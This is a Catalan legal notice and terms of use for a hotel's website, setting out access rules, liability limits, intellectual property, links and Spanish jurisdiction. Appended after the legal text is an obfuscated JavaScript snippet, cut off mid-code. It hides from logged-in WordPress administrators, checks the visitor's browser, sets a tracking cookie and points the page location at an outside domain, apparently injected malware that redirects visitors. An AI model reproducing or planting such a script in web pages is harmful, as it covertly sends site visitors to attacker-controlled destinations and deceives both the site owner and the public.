Avís Legal

A efectes de la legislació vigent en matèria de defensa i protecció de consumidors i usuaris, HOTEL MAS BOSCH 1526 informa que les imatges exhibides a continuació en aquest suport digital són una animació i, com a tal, tenen caràcter merament orientatiu, per la qual cosa el contingut de les mateixes està exempt de qualsevol mena de valor contractual.

CONDICIONS GENERALS PER A L’USUARI

www.hotelmasbosch1526.com és un domini d’internet el propietari del qual és la societat mercantil espanyola HOTEL MAS BOSCH 1526 S.L., amb domicili a Les Tres Cases / 17742 Avinyonet de Puigventós (Girona), proveïda de CIF nº B66916404 i inscrita al Registre Mercantil de GIRONA al tom 3148 foli 76 full GI-62045 (d’ara endavant, HOTEL MAS BOSCH 1526).

L’objectiu d’HOTEL MAS BOSCH 1526 amb la present pàgina web és el d’informar els usuaris dels projectes, promocions i serveis que la companyia ofereix en el mercat.

Els idiomes emprats al web són el castellà, el català, l’anglès, l’alemany i el francès. HOTEL MAS BOSCH 1526 no es responsabilitza de la no comprensió o enteniment dels idiomes del web per part de l’usuari, ni de les possibles conseqüències que això pugui tenir.

1. ACCÉS I ÚS GRATUÏT DEL LLOC WEB

L’accés al lloc web www.hotelmasbosch1526.com té caràcter gratuït. No obstant això, l’accés a determinats serveis o productes oferts a traves del lloc web podrien requerir el previ registre de les dades de l’usuari. Arribat el cas, l’usuari en serà degudament informat per part d’HOTEL MAS BOSCH 1526.

2. MODIFICACIONS AL LLOC WEB O ALS SERVEIS

HOTEL MAS BOSCH 1526 es reserva el dret a modificar unilateralment i en qualsevol moment, sense previ avís, la presentació o configuració del lloc web, així com els serveis, condicions generals i particulars. Aquestes modificacions seran per millorar els serveis oferts a l’usuari i actualitzar els continguts.

3. ÚS CORRECTE DEL LLOC WEB I SERVEIS

L’usuari es compromet a utilitzar el lloc web, els continguts i els serveis de conformitat amb la llei i les presents condicions generals, les condicions particulars, els bons costums i l’ordre públic. De la mateixa manera, l’usuari s’obliga a no utilitzar el lloc web i els serveis que s’hi ofereixen amb fins o efectes il·lícits, contraris al contingut d’aquestes condiciones generals, lesius dels drets o interessos de tercers, o que de qualsevol manera puguin danyar, inutilitzar, sobrecarregar o deteriorar el lloc web o els serveis o impedir la normal utilització o gaudi del lloc web per part d’altres usuaris.

L’usuari s’abstindrà d’obtenir informacions, missatges gràfics, dibuixos, arxius de so o imatge, fotografies, gravacions, software i, en general, qualsevol classe de material accessible a través del lloc web o dels serveis, emprant per a aquest efecte mitjans diferents dels que s’hagin posat a la seva disposició o, en general, dels que es fan servir habitualment a internet i usos diferents als expressament autoritzats.

L’usuari s’haurà d’abstenir de facilitar dades d’identitat pròpies que no permetin una correcta identificació.

L’usuari haurà d’abstenir-se de manipular els dispositius tècnics de protecció de continguts o d’informació i, en general, de configuració de l’espai web www.hotelmasbosch1526.com.

HOTEL MAS BOSCH 1526 es reserva el dret a denegar o retirar l’accés a la pàgina web www.hotelmasbosch1526.com en qualsevol moment i sense necessitat de preavís a aquells usuaris que incompleixin aquestes condicions generals o les condicions particulars de contractació o registre que resultin d’aplicació en cada moment. Així mateix, HOTEL MAS BOSCH 1526 podrà denegar o cancel·lar l’accés a aquells usuaris que atemptin contra els drets de tercers o que, de qualsevol forma, amb la seva actuació puguin danyar, inutilitzar, sobrecarregar o deteriorar el lloc web o els serveis o impedir la normal utilització o gaudi del lloc web per part d’altres usuaris.

4. LIMITACIÓ DE GARANTIES I RESPONSABILITATS

HOTEL MAS BOSCH 1526 no controla ni garanteix l’absència de virus ni d’altres elements en els continguts que puguin produir alteracions en el seu sistema informàtic (software i hardware) o en els documents electrònics i fitxers emmagatzemats al seu sistema informàtic. HOTEL MAS BOSCH 1526 exclou qualsevol responsabilitat pels danys i perjudicis de tota naturalesa que puguin ser deguts a la presència de virus o d’altres elements en els continguts que puguin produir alteracions en el seu sistema informàtic, documents electrònics o fitxers dels usuaris.

HOTEL MAS BOSCH 1526 farà tot el possible per garantir la seguretat de la informació que sigui facilitada pels usuaris. Això no obstant, no pot garantir que les transmissions d’informació siguin totalment segures.

Sens perjudici dels nivells de seguretat de protecció de dades de caràcter personal legalment requerits, com la instal·lació de tots els mitjans i mesures tècniques al seu abast per evitar la pèrdua, mal ús, alteració, accés no autoritzat i robatori de les dades facilitades, l’usuari sap i és conscient que la seguretat en l’entorn d’internet no pot garantir-se al cent per cent.

HOTEL MAS BOSCH 1526 exclou qualsevol responsabilitat pels danys i perjudicis de qualsevol classe que puguin ser deguts a la manca de veracitat, exactitud, exhaustivitat o actualitat dels continguts del lloc web www.hotelmasbosch1526.com

5. DRETS D’AUTOR, PROPIETAT INTEL·LECTUAL I INDUSTRIAL

Tots els continguts del lloc web www.hotelmasbosch1526.com són propietat exclusiva i mundial d’HOTEL MAS BOSCH 1526, incloent, sense limitació, disseny gràfic, logotips, imatges, textos, diàlegs, il·lustracions, fotografies, audiovisuals, tràilers, marques i altres signes distintius, en qualsevol dels llenguatges de programació utilitzats o utilitzables, així com tot el programari de funcionament i desenvolupament del lloc web. La reproducció, distribució, comunicació al públic, cessió i qualsevol altre acte o modalitat d’explotació que no hagi estat expressament autoritzat pel titular dels drets d’explotació queden expressament prohibits.

HOTEL MAS BOSCH 1526 no concedeix cap llicència o autorització d’ús de cap classe sobre els seus drets de propietat intel·lectual i industrial o sobre qualsevol altra propietat o dret relacionat amb la pàgina web i els serveis oferts. Qualsevol ús fraudulent o que no disposi de la deguda autorització d’HOTEL MAS BOSCH 1526 serà perseguit i penalitzat.

Totes les marques i denominacions de serveis que apareixen al lloc web www.hotelmasbosch1526.com són marques registrades. La resta de signes distintius són signes llicenciats prèviament pels seus titulars legítims a HOTEL MAS BOSCH 1526.

6. LINKS

El lloc web posa sovint a disposició de l’usuari dispositius tècnics d’enllaç (links, baners o botons), directoris i eines de cerca que permeten als usuaris accedir a llocs web pertanyents o gestionats per tercers. HOTEL MAS BOSCH 1526 no ofereix ni comercialitza per si mateix ni per mitjà de tercers els serveis disponibles en els llocs enllaçats, ni controla, exerceix vigilància o aprova els productes, serveis, continguts, informació, dades, arxius i qualsevol altra classe de material en aquests llocs enllaçats.

Per tant, HOTEL MAS BOSCH 1526 declina qualsevol responsabilitat respecte la informació que es trobi fora d’aquest lloc web i no gestionada per www.hotelmasbosch1526.com. La funció dels enllaços que apareixen és exclusivament la d’informar l’usuari sobre l’existència d’altres fonts d’informació sobre la matèria a internet, on podrà ampliar les dades ofertes en aquest lloc web. Aquests enllaços no suposen en cap cas un suggeriment, invitació o recomanació per a la visita dels llocs de destí i, per tant, HOTEL MAS BOSCH 1526 no serà responsable del resultat obtingut a través d’aquests enllaços hipertextuals.

7. LLEI I JURISDICCIÓ

Las presents condicions generals, així com qualsevol relació entre vostè i HOTEL MAS BOSCH 1526, es regiran per la legislació espanyola.

Per qualsevol qüestió litigiosa derivada de l’existència o contingut d’aquestes condicions generals o de les relacions entre l’usuari i HOTEL MAS BOSCH 1526, ambdues parts, en renúncia expressa a qualsevol altre fur que pogués correspondre’ls, se sotmeten a la jurisdicció i competència exclusiva dels jutjats i tribunals de la ciutat de BARCELONA.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m